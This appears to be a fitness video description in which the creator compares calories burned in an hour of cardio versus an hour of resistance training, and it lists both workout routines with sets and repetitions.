Hey my friends! How many calories can I burn doing 1 hour of cardio vs 1 hour of resistance training?! This video is just a bit of fun to see which activity burns more calories over an hour! I hope you enjoy it as much as I sweat!! I also talk about loads of other benefits of resistance training which is why I love it but this was just to see in the short term how many calories I could burn!

CARDIO WORKOUT (1hr):
– 10 mins running
– 10 mins stairclimber
– 15 mins cycling
– 15 mins rowing
– 10 mins climber

RESISTANCE WORKOUT (1HR) minimum rest:
– 5 x 5-8 front squats
– 4 x 8-10 jumping leg press
– 5 x 5 rack pulls
– 3 x 10 weighted press ups
– 4 x 12 weighted jumping alt. lunges
– 4 x 30m sled pushes
– 2 x 30m sled sprints
– 4 x 30m tyre flips
– 4 x 20m weighted side squat jumps
– 2 x 30m jumping bounds
– 3 x pull-ups to failure
